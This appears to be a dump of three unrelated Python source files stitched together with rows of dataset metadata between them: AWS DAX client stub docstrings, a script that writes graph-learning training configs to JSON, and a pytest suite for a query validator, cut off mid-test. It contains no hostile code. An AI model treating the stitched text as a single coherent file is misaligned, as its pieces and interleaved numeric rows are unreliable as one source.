:param Tags: [REQUIRED]\nThe tags to be assigned to the DAX resource.\n\n(dict) --A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.\nAWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .\nYou cannot backdate the application of a tag.\n\nKey (string) --The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.\n\nValue (string) --The value of the tag. Tag values are case-sensitive and can be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
Response Structure
(dict) --
Tags (list) --
The list of tags that are associated with the DAX resource.
(dict) --
A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.
AWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .
You cannot backdate the application of a tag.
Key (string) --
The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.
Value (string) --
The value of the tag. Tag values are case-sensitive and can be null.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.TagQuotaPerResourceExceeded
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
:returns:
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.TagQuotaPerResourceExceeded
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
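# Hedged usage sketch (illustrative tag values): attach a tag. Mind the
# documented 5-calls-per-second throttle if invoking this in a loop.
#
#   client.tag_resource(
#       ResourceName=arn,
#       Tags=[{'Key': 'env', 'Value': 'staging'}],
#   )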
def untag_resource(ResourceName=None, TagKeys=None):
"""
Removes the association of tags from a DAX resource. You can call UntagResource up to 5 times per second, per account.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceName='string',
TagKeys=[
'string',
]
)
:type ResourceName: string
:param ResourceName: [REQUIRED]\nThe name of the DAX resource from which the tags should be removed.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nA list of tag keys. If the DAX cluster has any tags with these keys, then the tags are removed from the cluster.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
Response Structure
(dict) --
Tags (list) --
The tag keys that have been removed from the cluster.
(dict) --
A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.
AWS-assigned tag names and values are automatically assigned the aws: prefix, which the user cannot assign. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .
You cannot backdate the application of a tag.
Key (string) --
The key for the tag. Tag keys are case sensitive. Every DAX cluster can only have one tag with the same key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.
Value (string) --
The value of the tag. Tag values are case-sensitive and can be null.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.TagNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
:returns:
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.TagNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
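# Hedged usage sketch: remove the tag added above by key. A missing key
# raises TagNotFoundFault, per the exceptions listed in the docstring.
#
#   client.untag_resource(ResourceName=arn, TagKeys=['env'])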
def update_cluster(ClusterName=None, Description=None, PreferredMaintenanceWindow=None, NotificationTopicArn=None, NotificationTopicStatus=None, ParameterGroupName=None, SecurityGroupIds=None):
"""
Modifies the settings for a DAX cluster. You can use this action to change one or more cluster configuration parameters by specifying the parameters and the new values.
See also: AWS API Documentation
Exceptions
:example: response = client.update_cluster(
ClusterName='string',
Description='string',
PreferredMaintenanceWindow='string',
NotificationTopicArn='string',
NotificationTopicStatus='string',
ParameterGroupName='string',
SecurityGroupIds=[
'string',
]
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster to be modified.\n
:type Description: string
:param Description: A description of the changes being made to the cluster.
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow: A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
:type NotificationTopicArn: string
:param NotificationTopicArn: The Amazon Resource Name (ARN) that identifies the topic.
:type NotificationTopicStatus: string
:param NotificationTopicStatus: The current state of the topic.
:type ParameterGroupName: string
:param ParameterGroupName: The name of a parameter group for this cluster.
:type SecurityGroupIds: list
:param SecurityGroupIds: A list of user-specified security group IDs to be assigned to each node in the DAX cluster. If this parameter is not specified, DAX assigns the default VPC security group to each node.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster, after it has been modified.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster).
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
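# Hedged usage sketch (illustrative values): narrow the maintenance window.
# Per the docstring, only ClusterName is required; supply just the settings
# being changed.
#
#   client.update_cluster(
#       ClusterName='my-dax',
#       PreferredMaintenanceWindow='sun:01:00-sun:03:00',
#   )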
def update_parameter_group(ParameterGroupName=None, ParameterNameValues=None):
"""
Modifies the parameters of a parameter group. You can modify up to 20 parameters in a single request by submitting a list of parameter name and value pairs.
See also: AWS API Documentation
Exceptions
:example: response = client.update_parameter_group(
ParameterGroupName='string',
ParameterNameValues=[
{
'ParameterName': 'string',
'ParameterValue': 'string'
},
]
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group.\n
:type ParameterNameValues: list
:param ParameterNameValues: [REQUIRED]\nAn array of name-value pairs for the parameters in the group. Each element in the array represents a single parameter.\n\n(dict) --An individual DAX parameter.\n\nParameterName (string) --The name of the parameter.\n\nParameterValue (string) --The value of the parameter.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
Response Structure
(dict) --
ParameterGroup (dict) --
The parameter group that has been modified.
ParameterGroupName (string) --
The name of the parameter group.
Description (string) --
A description of the parameter group.
Exceptions
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
:returns:
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
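# Hedged usage sketch: 'query-ttl-millis' is, to the best of our knowledge, a
# real DAX parameter name, but verify against describe_parameters before use.
#
#   client.update_parameter_group(
#       ParameterGroupName='my-params',
#       ParameterNameValues=[
#           {'ParameterName': 'query-ttl-millis', 'ParameterValue': '300000'},
#       ],
#   )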
def update_subnet_group(SubnetGroupName=None, Description=None, SubnetIds=None):
"""
Modifies an existing subnet group.
See also: AWS API Documentation
Exceptions
:example: response = client.update_subnet_group(
SubnetGroupName='string',
Description='string',
SubnetIds=[
'string',
]
)
:type SubnetGroupName: string
:param SubnetGroupName: [REQUIRED]\nThe name of the subnet group.\n
:type Description: string
:param Description: A description of the subnet group.
:type SubnetIds: list
:param SubnetIds: A list of subnet IDs in the subnet group.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
Response Structure
(dict) --
SubnetGroup (dict) --
The subnet group that has been modified.
SubnetGroupName (string) --
The name of the subnet group.
Description (string) --
The description of the subnet group.
VpcId (string) --
The Amazon Virtual Private Cloud identifier (VPC ID) of the subnet group.
Subnets (list) --
A list of subnets associated with the subnet group.
(dict) --
Represents the subnet associated with a DAX cluster. This parameter refers to subnets defined in Amazon Virtual Private Cloud (Amazon VPC) and used with DAX.
SubnetIdentifier (string) --
The system-assigned identifier for the subnet.
SubnetAvailabilityZone (string) --
The Availability Zone (AZ) for the subnet.
Exceptions
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.SubnetInUse
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
:returns:
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.SubnetInUse
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
"""
pass
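# Hedged usage sketch (placeholder subnet IDs): replace the subnet list of an
# existing group; Description and SubnetIds are optional per the docstring.
#
#   client.update_subnet_group(
#       SubnetGroupName='my-subnets',
#       SubnetIds=['subnet-0123456789abcdef0', 'subnet-0fedcba9876543210'],
#   )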
| 29.436815
| 789
| 0.651458
| 11,835
| 110,182
| 6.05602
| 0.059992
| 0.023231
| 0.045331
| 0.008776
| 0.856375
| 0.842409
| 0.830131
| 0.823602
| 0.811184
| 0.804501
| 0
| 0.006004
| 0.263791
| 110,182
| 3,742
| 790
| 29.444682
| 0.877572
| 0.973907
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
40e8a393ec0be0297cd829b769da4c6cb3b82597
| 3,508
|
py
|
Python
|
TopGraph/write_train_cfgs.py
|
mityanony404/TopGraph
|
23595ca5d3dfcd5bc5ebb771800e3fbe9a0d5eed
|
[
"MIT"
] | null | null | null |
TopGraph/write_train_cfgs.py
|
mityanony404/TopGraph
|
23595ca5d3dfcd5bc5ebb771800e3fbe9a0d5eed
|
[
"MIT"
] | null | null | null |
TopGraph/write_train_cfgs.py
|
mityanony404/TopGraph
|
23595ca5d3dfcd5bc5ebb771800e3fbe9a0d5eed
|
[
"MIT"
] | null | null | null |
import json
data = dict()
data['REDDIT-BINARY'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'REDDIT-BINARY',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
data['REDDIT-MULTI-5K'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'REDDIT-MULTI-5K',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
data['IMDB-BINARY'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'validation_ratio': 0.1,
'dataset': 'IMDB-BINARY',
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['IMDB-MULTI'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'IMDB-MULTI',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['PROTEINS'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'PROTEINS',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['NCI1'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'NCI1',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': False
}
data['PROTEINS_2'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'PROTEINS',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': True
}
data['NCI1_2'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'NCI1',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': False,
'use_node_label': True
}
data['DD'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'DD',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
data['ENZYMES'] = {
'lr': 1e-2,
'lmda': 1e-4,
'num_epochs': 100,
'batch_size': 32,
'use_pers': 0,
'gin_num': 1,
'gin_dim': 64,
'num_lin_layers': 2,
'dataset': 'ENZYMES',
'validation_ratio': 0.1,
'use_node_degree': True,
'set_node_degree_uninformative': True,
'use_node_label': False
}
with open('training_cfgs.txt', 'w') as outfile:
json.dump(data, outfile)
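# Hedged companion sketch (assumes the dump above has run): read the configs
# back and look one up by dataset key.
#
#   import json
#   with open('training_cfgs.txt') as f:
#       cfgs = json.load(f)
#   assert cfgs['PROTEINS']['lr'] == 0.01
#   assert cfgs['NCI1_2']['use_node_label'] is True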
| 22.202532
| 47
| 0.573831
| 488
| 3,508
| 3.811475
| 0.106557
| 0.075269
| 0.026882
| 0.048387
| 0.903226
| 0.903226
| 0.898925
| 0.898925
| 0.898925
| 0.898925
| 0
| 0.062945
| 0.239168
| 3,508
| 157
| 48
| 22.343949
| 0.633945
| 0
| 0
| 0.805195
| 0
| 0
| 0.460661
| 0.082668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006494
| 0
| 0.006494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc02581a708268b47ee82d879915d700f9f4fb0b
| 13,676
|
py
|
Python
|
tests/test_queries.py
|
meraki-analytics/datapipelines-python
|
dc38d7976a012039a15d67cd8b07ae77eb1e4a4c
|
[
"MIT"
] | 6
|
2018-07-27T16:16:55.000Z
|
2022-03-07T17:12:15.000Z
|
tests/test_queries.py
|
meraki-analytics/datapipelines
|
dc38d7976a012039a15d67cd8b07ae77eb1e4a4c
|
[
"MIT"
] | null | null | null |
tests/test_queries.py
|
meraki-analytics/datapipelines
|
dc38d7976a012039a15d67cd8b07ae77eb1e4a4c
|
[
"MIT"
] | 1
|
2016-10-20T11:54:20.000Z
|
2016-10-20T11:54:20.000Z
|
import pytest
from datapipelines import Query, QueryValidationError, QueryValidatorStructureError, validate_query
def test_has():
valid = Query.has("test")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_has():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").has("dog")
def test_can_have():
valid = Query.can_have("test")
assert valid({})
assert valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_can_have():
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").can_have("dog")
def test_repeat_have_can_have():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").can_have("dog")
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").has("dog")
def test_has_as():
valid = Query.has("test").as_(str)
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_can_have_as():
valid = Query.can_have("test").as_(str)
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({})
assert valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_as():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_(str).as_(str)
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_(str).as_(str)
def test_has_as_any_of():
valid = Query.has("test").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
assert valid({"test": 0})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_can_have_as_any_of():
valid = Query.can_have("test").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
assert valid({})
assert valid({"dog": "cat"})
assert valid({"test": 0})
assert valid({"test": "test"})
assert valid({"test": "test", "dog": "cat"})
def test_repeat_as_any_of():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_any_of({int, str}).as_any_of({int, str})
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_any_of({int, str}).as_any_of({int, str})
def test_repeat_as_as_any_of():
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_(str).as_any_of({int, str})
with pytest.raises(QueryValidatorStructureError):
Query.has("test").as_any_of({int, str}).as_(str)
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_(str).as_any_of({int, str})
with pytest.raises(QueryValidatorStructureError):
Query.can_have("test").as_any_of({int, str}).as_(str)
def test_has_or():
valid = Query.has("test").or_("dog").or_("foo")
with pytest.raises(QueryValidationError):
valid({})
assert valid({"test": "test"})
assert valid({"dog": "cat"})
assert valid({"foo": "bar"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_can_have_or():
valid = Query.can_have("test").or_("dog").or_("foo")
assert valid({})
assert valid({"test": "test"})
assert valid({"dog": "cat"})
assert valid({"foo": "bar"})
assert valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_has_as_or():
valid = Query.has("test").as_(str).or_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({"test": "test"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_can_have_as_or():
valid = Query.can_have("test").as_(str).or_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
assert valid({})
assert valid({"test": "test"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_has_as_any_of_or():
valid = Query.has("test").as_any_of({str, int}).or_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"dog": "cat"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_can_have_as_any_of_or():
valid = Query.can_have("test").as_any_of({str, int}).or_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
assert valid({})
assert valid({"test": "test"})
assert valid({"test": 0})
assert valid({"dog": "cat"})
assert valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_and():
valid = Query.has("test").and_("dog").and_("foo")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"foo": "bar"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
assert valid({"test": "test", "dog": "cat", "foo": "bar"})
def test_has_as_and():
valid = Query.has("test").as_(str).and_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
assert valid({"test": "test", "dog": 0})
def test_can_have_as_and():
valid = Query.can_have("test").as_(str).and_("dog").as_(int)
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
with pytest.raises(QueryValidationError):
valid({"test": 0, "dog": "cat"})
assert valid({})
assert valid({"test": "test", "dog": 0})
def test_has_as_any_of_and():
valid = Query.has("test").as_any_of({str, int}).and_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "dog": 0})
assert valid({"test": 0, "dog": "cat"})
assert valid({"test": 0, "dog": 0})
def test_can_have_as_any_of_and():
valid = Query.can_have("test").as_any_of({str, int}).and_("dog").as_any_of({str, int})
with pytest.raises(QueryValidationError):
valid({"test": 0.0})
with pytest.raises(QueryValidationError):
valid({"test": 0})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": 0.0})
with pytest.raises(QueryValidationError):
valid({"dog": 0})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"test": 0.0, "dog": 0.0})
assert valid({})
assert valid({"test": "test", "dog": "cat"})
assert valid({"test": "test", "dog": 0})
assert valid({"test": 0, "dog": "cat"})
assert valid({"test": 0, "dog": 0})
def test_has_nested_and_or():
valid = Query.has("test").and_("cat").or_("dog")
with pytest.raises(QueryValidationError):
valid({})
with pytest.raises(QueryValidationError):
valid({"test": "test"})
with pytest.raises(QueryValidationError):
valid({"dog": "cat"})
with pytest.raises(QueryValidationError):
valid({"cat": "dog"})
with pytest.raises(QueryValidationError):
